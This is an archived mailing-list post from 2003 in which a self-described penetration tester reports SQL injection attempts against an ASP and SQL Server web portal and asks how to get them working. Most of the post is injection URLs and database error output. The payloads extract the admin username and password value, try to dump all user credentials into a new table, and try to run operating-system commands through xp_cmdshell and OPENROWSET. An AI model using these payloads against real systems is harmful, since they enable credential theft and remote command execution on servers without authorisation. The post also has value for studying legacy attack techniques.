SQL Injection ASP + SQL Server (problem) ?!

• Previous message: chaitan_at_nullcube.com: "Re: Wireless MITM"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: pen-test@securityfocus.com
Date: Mon, 28 Jul 2003 10:11:54 -0300 (BRT)

Hi,

I'm doing a pen-test in a WebServer running Win2K + IIS + ASP + SQL
Server (filtred for internet connections).

The IIS appear to be very well patched. I'm trying SQL Injection. :)

I found a bug in ASP Script... see:

http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--

I received the name of the min(user) in users tables, see:

Technical Information (for support personnel)

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'admin' to a column of data type int.

The username is "admin". Now i want to know the password of "admin" i
tryed:

http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--

But i received it:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more
than 1 value. This is not permitted when the subquery follows =, !=,
<, <= , >, >= or when the subquery is used as an expression.

1 - Someone know how to do it return more than 1 value ?? can give-me
a example ?

I tryed it too:

http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--

And i receive it:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481-0512-0545-0576-0609-0640}'
to a column of data type int.

2 - But it isn't a "password", it appear be a registry key. Someone
know what is it ?? And how to do it work and see the password ? :)

3 - I tryed to create a SQL Transaction like this:

http://www.server.com/portal/index.asp?local=read&id_noticia=";%20begin%20declare%20@ret%20varchar(8000)%20set%20@ret=':'%20select%20@ret=@ret+'%20+user+'/'+senha%20from%20users%20where%20user>@ret%20select%20@ret%20as%20ret%20into%20alluser%20end%20--

I receive it:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
starts with '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret '  user '/' senha from users where user>@ret select @ret
as' is too long. Maximum length is 128.

Someone know why i received this error ?? I overfflowed the sized
allowed in paramter by variable in ASP ? or in SQL Server ? How to do
it work ?? :)

4 - My last doubt. I tryed execute commands with xp_cmdshell.. see:

http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--

and receive:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
before the character string ';EXEC master..xp_cmdshell(cmd.exe /c)--'.

OR:

http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
syntax near ';EXEC master.dbo.xp_cmdshell'.

OR using quotes:

http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
syntax near '`'.

And tryed too (use the bug to exec xp_cmdshell stored procedure with a
non privilegied user):

http://www.server.com/portal/index.asp?local=read&id_notice=";(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--

I receive ... again the error:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
starts with ';(SELECT * FROM
OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET
FMTONLY OFF execute master..xp_cmdshell' is too long. Maximum length
is 128.

If i try:

http://www.server.com/portal/index.asp?local=read&id_notice=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--

I receive:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not create an
instance of OLE DB provider 'SQLOLEDB'.

What i'm doing wrong ?? How to do it work ??

Thkz a lot.

Best Regards.

[ ]'s

---------------------------------------------------------------------------
----------------------------------------------------------------------------

• Previous message: chaitan_at_nullcube.com: "Re: Wireless MITM"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]